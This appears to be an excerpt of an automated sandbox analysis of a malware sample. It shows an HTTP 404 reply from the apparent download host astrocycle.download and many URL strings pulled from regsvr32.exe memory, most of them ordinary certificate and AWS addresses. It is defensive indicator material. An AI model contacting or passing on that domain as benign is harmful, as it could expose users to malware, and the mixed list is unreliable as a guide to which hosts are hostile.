HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 06 Jul 2021 14:14:32 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=KuhKM80SplBMqRuDPEVNkKb%2FLxIwjd%2Fy45X0uT%2FhCO9e4gWCMJM0gnZUOG%2FP3qaLAHPhj90%2FxbX5wkzLPERP7T%2F3E0dRHPVpLsyFkCAt5k7WvYLe%2Bz4tWAZVEJtbbH0AiA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 66a970a29b1dbef6-FRAalt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400Data Raw: 31 31 31 0d 0a 09 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 09 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 09 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 09 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 09 3c 68 72 3e 0a 09 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 61 73 74 72 6f 63 79 63 6c 65 2e 64 6f 77 6e 6c 6f 61 64 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 09 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 111<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at astrocycle.download Port 80</address></body></html>

Source: regsvr32.exe, 00000004.00000002.2091763372.000000000020D000.00000004.00000020.sdmp	String found in binary or memory: http://astrocycle.download/
Source: regsvr32.exe, 00000004.00000003.2089238305.0000000000245000.00000004.00000001.sdmp	String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: regsvr32.exe, 00000004.00000002.2091798590.0000000000255000.00000004.00000020.sdmp	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: regsvr32.exe, 00000004.00000003.2089238305.0000000000245000.00000004.00000001.sdmp	String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: regsvr32.exe, 00000004.00000002.2091798590.0000000000255000.00000004.00000020.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: regsvr32.exe, 00000004.00000003.2089238305.0000000000245000.00000004.00000001.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: regsvr32.exe, 00000004.00000003.2089238305.0000000000245000.00000004.00000001.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: regsvr32.exe, 00000004.00000003.2089207344.000000000020C000.00000004.00000001.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: regsvr32.exe, 00000004.00000003.2089223405.0000000000228000.00000004.00000001.sdmp	String found in binary or memory: http://crl.rootg2.amazontrust.com/rootg2.crl0
Source: regsvr32.exe, 00000004.00000003.2089207344.000000000020C000.00000004.00000001.sdmp	String found in binary or memory: http://crl.sca1b.amazontrus
Source: regsvr32.exe, 00000004.00000003.2089207344.000000000020C000.00000004.00000001.sdmp	String found in binary or memory: http://crl.sca1b.amazontrusP
Source: regsvr32.exe, 00000004.00000003.2089207344.000000000020C000.00000004.00000001.sdmp	String found in binary or memory: http://crl.sca1b.amazontrust.com/sca1b.crl0
Source: regsvr32.exe, 00000004.00000003.2089207344.000000000020C000.00000004.00000001.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: regsvr32.exe, 00000004.00000003.2089223405.0000000000228000.00000004.00000001.sdmp	String found in binary or memory: http://crt.rootg2.amazontrust.com/rootg2.cer0=
Source: regsvr32.exe, 00000004.00000003.2089207344.000000000020C000.00000004.00000001.sdmp	String found in binary or memory: http://crt.sca1b.amazontrust.com/sca1b.crt0
Source: regsvr32.exe, 00000004.00000002.2093193862.00000000031B0000.00000002.00000001.sdmp	String found in binary or memory: http://investor.msn.com
Source: regsvr32.exe, 00000004.00000002.2093193862.00000000031B0000.00000002.00000001.sdmp	String found in binary or memory: http://investor.msn.com/
Source: regsvr32.exe, 00000004.00000002.2093388599.0000000003397000.00000002.00000001.sdmp	String found in binary or memory: http://localizability/practices/XML.asp
Source: regsvr32.exe, 00000004.00000002.2093388599.0000000003397000.00000002.00000001.sdmp	String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: regsvr32.exe, 00000004.00000003.2089223405.0000000000228000.00000004.00000001.sdmp	String found in binary or memory: http://o.ss2.us/0
Source: regsvr32.exe, 00000004.00000003.2089238305.0000000000245000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: regsvr32.exe, 00000004.00000003.2089238305.0000000000245000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com0%
Source: regsvr32.exe, 00000004.00000002.2091798590.0000000000255000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.comodoca.com0-
Source: regsvr32.exe, 00000004.00000003.2089238305.0000000000245000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com0/
Source: regsvr32.exe, 00000004.00000003.2089238305.0000000000245000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com05
Source: regsvr32.exe, 00000004.00000003.2089238305.0000000000245000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.entrust.net03
Source: regsvr32.exe, 00000004.00000002.2091798590.0000000000255000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.entrust.net0D
Source: regsvr32.exe, 00000004.00000003.2089207344.000000000020C000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: regsvr32.exe, 00000004.00000003.2089207344.000000000020C000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.rootg2.amazontrust.com08
Source: regsvr32.exe, 00000004.00000003.2089207344.000000000020C000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.sca1b
Source: regsvr32.exe, 00000004.00000003.2089207344.000000000020C000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.sca1b.amazontrust.com06
Source: regsvr32.exe, 00000004.00000003.2089223405.0000000000228000.00000004.00000001.sdmp	String found in binary or memory: http://s.ss2.us/r.crl0
Source: regsvr32.exe, 00000004.00000002.2092803590.0000000002DC0000.00000002.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: regsvr32.exe, 00000003.00000002.2084482057.0000000001CC0000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2091912237.0000000001CC0000.00000002.00000001.sdmp, regsvr32.exe, 00000005.00000002.2092508060.0000000001D50000.00000002.00000001.sdmp	String found in binary or memory: http://servername/isapibackend.dll
Source: regsvr32.exe, 00000004.00000002.2093388599.0000000003397000.00000002.00000001.sdmp	String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: regsvr32.exe, 00000004.00000002.2093388599.0000000003397000.00000002.00000001.sdmp	String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: regsvr32.exe, 00000004.00000002.2092803590.0000000002DC0000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.comPA
Source: regsvr32.exe, 00000004.00000002.2091798590.0000000000255000.00000004.00000020.sdmp	String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: regsvr32.exe, 00000004.00000003.2089238305.0000000000245000.00000004.00000001.sdmp	String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: regsvr32.exe, 00000004.00000002.2093193862.00000000031B0000.00000002.00000001.sdmp	String found in binary or memory: http://www.hotmail.com/oe
Source: regsvr32.exe, 00000004.00000002.2093388599.0000000003397000.00000002.00000001.sdmp	String found in binary or memory: http://www.icra.org/vocabulary/.
Source: regsvr32.exe, 00000004.00000002.2093193862.00000000031B0000.00000002.00000001.sdmp	String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: regsvr32.exe, 00000004.00000002.2093193862.00000000031B0000.00000002.00000001.sdmp	String found in binary or memory: http://www.windows.com/pctv.
Source: regsvr32.exe, 00000004.00000003.2089223405.0000000000228000.00000004.00000001.sdmp	String found in binary or memory: http://x.ss2.us/x.cer0&
Source: regsvr32.exe, 00000004.00000003.2089202347.0000000002C0A000.00000004.00000001.sdmp	String found in binary or memory: https://112-tzm-766.mktoresp.com
Source: regsvr32.exe, 00000004.00000003.2089202347.0000000002C0A000.00000004.00000001.sdmp	String found in binary or memory: https://112-tzm-766.mktoutil.com
Source: regsvr32.exe, 00000004.00000002.2092756344.0000000002C09000.00000004.00000001.sdmp	String found in binary or memory: https://a0.awsstatic.com
Source: regsvr32.exe, 00000004.00000003.2089123849.0000000002C1C000.00000004.00000001.sdmp	String found in binary or memory: https://a0.awsstatic.com/aws-blog/1.0.47/js
Source: regsvr32.exe, 00000004.00000003.2089123849.0000000002C1C000.00000004.00000001.sdmp	String found in binary or memory: https://a0.awsstatic.com/da/js/1.0.47/aws-da.js
Source: regsvr32.exe, 00000004.00000003.2089123849.0000000002C1C000.00000004.00000001.sdmp	String found in binary or memory: https://a0.awsstatic.com/g11n-lib/2.0.76
Source: regsvr32.exe, 00000004.00000003.2089202347.0000000002C0A000.00000004.00000001.sdmp	String found in binary or memory: https://a0.awsstatic.com/lib
Source: regsvr32.exe, 00000004.00000003.2089123849.0000000002C1C000.00000004.00000001.sdmp	String found in binary or memory: https://a0.awsstatic.com/libra-css/css/1.0.382
Source: regsvr32.exe, 00000004.00000003.2089123849.0000000002C1C000.00000004.00000001.sdmp	String found in binary or memory: https://a0.awsstatic.com/libra-css/css/1.0.382/style-awsm.css
Source: regsvr32.exe, 00000004.00000003.2089123849.0000000002C1C000.00000004.00000001.sdmp	String found in binary or memory: https://a0.awsstatic.com/libra-css/images
Source: regsvr32.exe, 00000004.00000003.2089123849.0000000002C1C000.00000004.00000001.sdmp	String found in binary or memory: https://a0.awsstatic.com/libra-css/images/gi-map/AWS_Global-Infrastructure-Map.svg
Source: regsvr32.exe, 00000004.00000003.2089123849.0000000002C1C000.00000004.00000001.sdmp	String found in binary or memory: https://a0.awsstatic.com/libra-css/images/logos/aws_logo_smile_1200x630.png
Source: regsvr32.exe, 00000004.00000003.2089123849.0000000002C1C000.00000004.00000001.sdmp	String found in binary or memory: https://a0.awsstatic.com/libra-css/images/logos/aws_logo_smile_179x109.png
Source: regsvr32.exe, 00000004.00000003.2089123849.0000000002C1C000.00000004.00000001.sdmp	String found in binary or memory: https://a0.awsstatic.com/libra-css/images/site/fav/favicon.ico
Source: regsvr32.exe, 00000004.00000003.2089123849.0000000002C1C000.00000004.00000001.sdmp	String found in binary or memory: https://a0.awsstatic.com/libra-css/images/site/touch-icon-ipad-144-smile.png
Source: regsvr32.exe, 00000004.00000003.2089123849.0000000002C1C000.00000004.00000001.sdmp	String found in binary or memory: https://a0.awsstatic.com/libra-css/images/site/touch-icon-iphone-114-smile.png
Source: regsvr32.exe, 00000004.00000003.2089123849.0000000002C1C000.00000004.00000001.sdmp	String found in binary or memory: https://a0.awsstatic.com/libra-search/1.0.13/js
Source: regsvr32.exe, 00000004.00000003.2089123849.0000000002C1C000.00000004.00000001.sdmp	String found in binary or memory: https://a0.awsstatic.com/libra/1.0.385/directories
Source: regsvr32.exe, 00000004.00000003.2089123849.0000000002C1C000.00000004.00000001.sdmp	String found in binary or memory: https://a0.awsstatic.com/libra/1.0.385/libra-cardsui
Source: regsvr32.exe, 00000004.00000003.2089123849.0000000002C1C000.00000004.00000001.sdmp	String found in binary or memory: https://a0.awsstatic.com/libra/1.0.385/libra-head.js
Source: regsvr32.exe, 00000004.00000003.2089123849.0000000002C1C000.00000004.00000001.sdmp	String found in binary or memory: https://a0.awsstatic.com/libra/1.0.385/librastandardlib
Source: regsvr32.exe, 00000004.00000003.2089123849.0000000002C1C000.00000004.00000001.sdmp	String found in binary or memory: https://a0.awsstatic.com/plc/js/1.0.112/plc
Source: regsvr32.exe, 00000004.00000003.2089123849.0000000002C1C000.00000004.00000001.sdmp	String found in binary or memory: https://a0.awsstatic.com/pricing-calculator/js/1.0.2
Source: regsvr32.exe, 00000004.00000003.2089123849.0000000002C1C000.00000004.00000001.sdmp	String found in binary or memory: https://a0.awsstatic.com/pricing-savings-plan/js/1.0.6
Source: regsvr32.exe, 00000004.00000003.2089123849.0000000002C1C000.00000004.00000001.sdmp	String found in binary or memory: https://a0.awsstatic.com/psf/null
Source: regsvr32.exe, 00000004.00000003.2089123849.0000000002C1C000.00000004.00000001.sdmp	String found in binary or memory: https://a0.awsstatic.com/s_code/js/3.0/awshome_s_code.js
Source: regsvr32.exe, 00000004.00000003.2089123849.0000000002C1C000.00000004.00000001.sdmp	String found in binary or memory: https://a0.awsstatic.com/target/1.0.114/aws-target-mediator.js
Source: regsvr32.exe, 00000004.00000002.2092756344.0000000002C09000.00000004.00000001.sdmp	String found in binary or memory: https://a0.awsstatic.com;
Source: regsvr32.exe, 00000004.00000003.2089202347.0000000002C0A000.00000004.00000001.sdmp	String found in binary or memory: https://a0.p.awsstatic.com
Source: regsvr32.exe, 00000004.00000003.2089202347.0000000002C0A000.00000004.00000001.sdmp	String found in binary or memory: https://a1.awsstatic.com
Source: regsvr32.exe, 00000004.00000002.2091798590.0000000000255000.00000004.00000020.sdmp	String found in binary or memory: https://amazon.com/
Source: regsvr32.exe, 00000004.00000002.2092756344.0000000002C09000.00000004.00000001.sdmp	String found in binary or memory: https://amazonwebservices.d2.sc.omtrdc.net
Source: regsvr32.exe, 00000004.00000003.2089202347.0000000002C0A000.00000004.00000001.sdmp	String found in binary or memory: https://amazonwebservicesinc.tt.omtrdc.net
Source: regsvr32.exe, 00000004.00000003.2089202347.0000000002C0A000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2092756344.0000000002C09000.00000004.00000001.sdmp	String found in binary or memory: https://anchor.fm
Source: regsvr32.exe, 00000004.00000003.2089202347.0000000002C0A000.00000004.00000001.sdmp	String found in binary or memory: https://api.regional-table.region-services.aws.a2z.com
Source: regsvr32.exe, 00000004.00000003.2089202347.0000000002C0A000.00000004.00000001.sdmp	String found in binary or memory: https://api.us-west-2.prod.pricing.aws.a2z.com
Source: regsvr32.exe, 00000004.00000002.2092756344.0000000002C09000.00000004.00000001.sdmp	String found in binary or memory: https://aws-quickstart.s3.amazonaws.com
Source: regsvr32.exe, 00000004.00000003.2089123849.0000000002C1C000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2089207344.000000000020C000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2089170751.0000000000255000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/
Source: regsvr32.exe, 00000004.00000003.2089123849.0000000002C1C000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/?nc1=h_ls
Source: regsvr32.exe, 00000004.00000003.2089123849.0000000002C1C000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/?nc2=h_lg
Source: regsvr32.exe, 00000004.00000003.2089123849.0000000002C1C000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/ar/
Source: regsvr32.exe, 00000004.00000003.2089123849.0000000002C1C000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/ar/?nc1=h_ls
Source: regsvr32.exe, 00000004.00000003.2089123849.0000000002C1C000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/cn/
Source: regsvr32.exe, 00000004.00000003.2089123849.0000000002C1C000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/cn/?nc1=h_ls
Source: regsvr32.exe, 00000004.00000003.2089123849.0000000002C1C000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/de/
Source: regsvr32.exe, 00000004.00000003.2089123849.0000000002C1C000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/de/?nc1=h_ls
Source: regsvr32.exe, 00000004.00000003.2089123849.0000000002C1C000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/es/
Source: regsvr32.exe, 00000004.00000003.2089123849.0000000002C1C000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/es/?nc1=h_ls
Source: regsvr32.exe, 00000004.00000003.2089123849.0000000002C1C000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/fr/
Source: regsvr32.exe, 00000004.00000003.2089123849.0000000002C1C000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/fr/?nc1=h_ls
Source: regsvr32.exe, 00000004.00000003.2089123849.0000000002C1C000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/id/
Source: regsvr32.exe, 00000004.00000003.2089123849.0000000002C1C000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/id/?nc1=h_ls
Source: regsvr32.exe, 00000004.00000003.2089123849.0000000002C1C000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/it/
Source: regsvr32.exe, 00000004.00000003.2089123849.0000000002C1C000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/it/?nc1=h_ls
Source: regsvr32.exe, 00000004.00000003.2089123849.0000000002C1C000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/jp/
Source: regsvr32.exe, 00000004.00000003.2089123849.0000000002C1C000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/jp/?nc1=h_ls
Source: regsvr32.exe, 00000004.00000003.2089123849.0000000002C1C000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/ko/
Source: regsvr32.exe, 00000004.00000003.2089123849.0000000002C1C000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/ko/?nc1=h_ls
Source: regsvr32.exe, 00000004.00000003.2089123849.0000000002C1C000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/marketplace/?nc2=h_mo
Source: regsvr32.exe, 00000004.00000003.2089123849.0000000002C1C000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/marketplace/?nc2=h_ql_mp
Source: regsvr32.exe, 00000004.00000003.2089123849.0000000002C1C000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/podcasts/aws-podcast/
Source: regsvr32.exe, 00000004.00000003.2089123849.0000000002C1C000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/privacy/?nc1=f_pr
Source: regsvr32.exe, 00000004.00000003.2089123849.0000000002C1C000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/pt/
Source: regsvr32.exe, 00000004.00000003.2089123849.0000000002C1C000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/pt/?nc1=h_ls
Source: regsvr32.exe, 00000004.00000003.2089123849.0000000002C1C000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/ru/
Source: regsvr32.exe, 00000004.00000003.2089123849.0000000002C1C000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/ru/?nc1=h_ls
Source: regsvr32.exe, 00000004.00000003.2089123849.0000000002C1C000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/search
Source: regsvr32.exe, 00000004.00000003.2089123849.0000000002C1C000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/search/
Source: regsvr32.exe, 00000004.00000003.2089123849.0000000002C1C000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/search/?searchQuery=
Source: regsvr32.exe, 00000004.00000003.2089123849.0000000002C1C000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/terms/?nc1=f_pr
Source: regsvr32.exe, 00000004.00000003.2089123849.0000000002C1C000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/th/
Source: regsvr32.exe, 00000004.00000003.2089123849.0000000002C1C000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/th/?nc1=f_ls
Source: regsvr32.exe, 00000004.00000003.2089123849.0000000002C1C000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/tr/
Source: regsvr32.exe, 00000004.00000003.2089123849.0000000002C1C000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/tr/?nc1=h_ls
Source: regsvr32.exe, 00000004.00000003.2089123849.0000000002C1C000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/tw/
Source: regsvr32.exe, 00000004.00000003.2089123849.0000000002C1C000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/tw/?nc1=h_ls
Source: regsvr32.exe, 00000004.00000003.2089123849.0000000002C1C000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/vi/
Source: regsvr32.exe, 00000004.00000003.2088949225.0000000002C0D000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/vi/?nc1=f_ls
Source: regsvr32.exe, 00000004.00000002.2092756344.0000000002C09000.00000004.00000001.sdmp	String found in binary or memory: https://awsmedia.s3.amazonaws.com
Source: regsvr32.exe, 00000004.00000003.2089202347.0000000002C0A000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2092756344.0000000002C09000.00000004.00000001.sdmp	String found in binary or memory: https://awspodcastsiberiaent.s3.eu-west-3.amazonaws.com
Source: regsvr32.exe, 00000004.00000003.2089202347.0000000002C0A000.00000004.00000001.sdmp	String found in binary or memory: https://b0.p.awsstatic.com
Source: regsvr32.exe, 00000004.00000002.2092756344.0000000002C09000.00000004.00000001.sdmp	String found in binary or memory: https://c0.b0.p.awsstatic.com
Source: regsvr32.exe, 00000004.00000002.2092756344.0000000002C09000.00000004.00000001.sdmp	String found in binary or memory: https://calculator.aws
Source: regsvr32.exe, 00000004.00000003.2089202347.0000000002C0A000.00000004.00000001.sdmp	String found in binary or memory: https://chtbl.com
Source: regsvr32.exe, 00000004.00000003.2089123849.0000000002C1C000.00000004.00000001.sdmp	String found in binary or memory: https://console.aws.amazon.com/?nc2=h_m_mc
Source: regsvr32.exe, 00000004.00000003.2089123849.0000000002C1C000.00000004.00000001.sdmp	String found in binary or memory: https://console.aws.amazon.com/billing/home?nc2=h_m_bc
Source: regsvr32.exe, 00000004.00000003.2089123849.0000000002C1C000.00000004.00000001.sdmp	String found in binary or memory: https://console.aws.amazon.com/console/home
Source: regsvr32.exe, 00000004.00000003.2089123849.0000000002C1C000.00000004.00000001.sdmp	String found in binary or memory: https://console.aws.amazon.com/console/home?nc1=f_ct&src=footer-signin-mobile
Source: regsvr32.exe, 00000004.00000003.2089123849.0000000002C1C000.00000004.00000001.sdmp	String found in binary or memory: https://console.aws.amazon.com/iam/home?nc2=h_m_sc#security_credential
Source: regsvr32.exe, 00000004.00000003.2089123849.0000000002C1C000.00000004.00000001.sdmp	String found in binary or memory: https://console.aws.amazon.com/support/home/?nc1=f_dr
Source: regsvr32.exe, 00000004.00000003.2089123849.0000000002C1C000.00000004.00000001.sdmp	String found in binary or memory: https://console.aws.amazon.com/support/home/?nc2=h_ql_cu
Source: regsvr32.exe, 00000004.00000003.2089123849.0000000002C1C000.00000004.00000001.sdmp	String found in binary or memory: https://console.aws.amazon.com/support/home?nc2=h_ql_cu
Source: regsvr32.exe, 00000004.00000002.2092756344.0000000002C09000.00000004.00000001.sdmp	String found in binary or memory: https://d0.awsstatic.com
Source: regsvr32.exe, 00000004.00000002.2092756344.0000000002C09000.00000004.00000001.sdmp	String found in binary or memory: https://d1.awsstatic-china.com
Source: regsvr32.exe, 00000004.00000002.2092756344.0000000002C09000.00000004.00000001.sdmp	String found in binary or memory: https://d1.awsstatic.com
Source: regsvr32.exe, 00000004.00000002.2092756344.0000000002C09000.00000004.00000001.sdmp	String found in binary or memory: https://d1fgizr415o1r6.cloudfront.net
Source: regsvr32.exe, 00000004.00000003.2089202347.0000000002C0A000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2092756344.0000000002C09000.00000004.00000001.sdmp	String found in binary or memory: https://d1hemuljm71t2j.cloudfront.net
Source: regsvr32.exe, 00000004.00000003.2089202347.0000000002C0A000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2092756344.0000000002C09000.00000004.00000001.sdmp	String found in binary or memory: https://d1le29qyzha1u4.cloudfront.net
Source: regsvr32.exe, 00000004.00000003.2089202347.0000000002C0A000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2092756344.0000000002C09000.00000004.00000001.sdmp	String found in binary or memory: https://d1oqpvwii7b6rh.cloudfront.net
Source: regsvr32.exe, 00000004.00000003.2089202347.0000000002C0A000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2092756344.0000000002C09000.00000004.00000001.sdmp	String found in binary or memory: https://d1vo51ubqkiilx.cloudfront.net
Source: regsvr32.exe, 00000004.00000003.2089202347.0000000002C0A000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2092756344.0000000002C09000.00000004.00000001.sdmp	String found in binary or memory: https://d1yyh5dhdgifnx.cloudfront.net
Source: regsvr32.exe, 00000004.00000003.2089202347.0000000002C0A000.00000004.00000001.sdmp	String found in binary or memory: https://d2908q01vomqb2.cloudfront.net
Source: regsvr32.exe, 00000004.00000002.2092756344.0000000002C09000.00000004.00000001.sdmp	String found in binary or memory: https://d2a6igt6jhaluh.cloudfront.net
Source: regsvr32.exe, 00000004.00000003.2089202347.0000000002C0A000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2092756344.0000000002C09000.00000004.00000001.sdmp	String found in binary or memory: https://d36cz9buwru1tt.cloudfront.net
Source: regsvr32.exe, 00000004.00000002.2092756344.0000000002C09000.00000004.00000001.sdmp	String found in binary or memory: https://d3borx6sfvnesb.cloudfront.net
Source: regsvr32.exe, 00000004.00000002.2092756344.0000000002C09000.00000004.00000001.sdmp	String found in binary or memory: https://d3ctxlq1ktw2nl.cloudfront.net
Source: regsvr32.exe, 00000004.00000003.2089202347.0000000002C0A000.00000004.00000001.sdmp	String found in binary or memory: https://d3h2ozso0dirfl.cloudfront.net
Source: regsvr32.exe, 00000004.00000002.2092756344.0000000002C09000.00000004.00000001.sdmp	String found in binary or memory: https://dc.ads.linke
Source: regsvr32.exe, 00000004.00000003.2089202347.0000000002C0A000.00000004.00000001.sdmp	String found in binary or memory: https://dc.ads.linkedin.com
Source: regsvr32.exe, 00000004.00000003.2089123849.0000000002C1C000.00000004.00000001.sdmp	String found in binary or memory: https://dc.ads.linkedin.com/collect/?pid=3038&fmt=gif
Source: regsvr32.exe, 00000004.00000003.2089123849.0000000002C1C000.00000004.00000001.sdmp	String found in binary or memory: https://devices.amazonaws.com?hp=tile&so-exp=below
Source: regsvr32.exe, 00000004.00000003.2089202347.0000000002C0A000.00000004.00000001.sdmp	String found in binary or memory: https://dftu77xade0tc.cloudfront.net
Source: regsvr32.exe, 00000004.00000003.2089202347.0000000002C0A000.00000004.00000001.sdmp	String found in binary or memory: https://dgen8gghn3u86.cloudfront.net
Source: regsvr32.exe, 00000004.00000003.2089202347.0000000002C0A000.00000004.00000001.sdmp	String found in binary or memory: https://dk261l6wntthl.cloudfront.net
Source: regsvr32.exe, 00000004.00000003.2089202347.0000000002C0A000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2092756344.0000000002C09000.00000004.00000001.sdmp	String found in binary or memory: https://docs.aws.amazon.com
Source: regsvr32.exe, 00000004.00000003.2089123849.0000000002C1C000.00000004.00000001.sdmp	String found in binary or memory: https://docs.aws.amazon.com/index.html?nc2=h_ql_doc
Source: regsvr32.exe, 00000004.00000003.2089202347.0000000002C0A000.00000004.00000001.sdmp	String found in binary or memory: https://download.stormacq.com/aws/podcast/
Source: regsvr32.exe, 00000004.00000002.2092756344.0000000002C09000.00000004.00000001.sdmp	String found in binary or memory: https://dpm.demdex.net
Source: regsvr32.exe, 00000004.00000003.2089202347.0000000002C0A000.00000004.00000001.sdmp	String found in binary or memory: https://dts.podtrac.com
Source: regsvr32.exe, 00000004.00000002.2092756344.0000000002C09000.00000004.00000001.sdmp	String found in binary or memory: https://f0.awsstatic.com
Source: regsvr32.exe, 00000004.00000002.2092756344.0000000002C09000.00000004.00000001.sdmp	String found in binary or memory: https://fls-na.amazon.com
Source: regsvr32.exe, 00000004.00000003.2089123849.0000000002C1C000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2091748427.00000000001FE000.00000004.00000020.sdmp	String found in binary or memory: https://fls-na.amazon.com/1/action-impressions/1/OE/aws-mktg/action/awsm_:comp_DeprecatedBrowser
Source: regsvr32.exe, 00000004.00000002.2092756344.0000000002C09000.00000004.00000001.sdmp	String found in binary or memory: https://fonts.g
Source: regsvr32.exe, 00000004.00000003.2089202347.0000000002C0A000.00000004.00000001.sdmp	String found in binary or memory: https://fonts.gstatic.com;
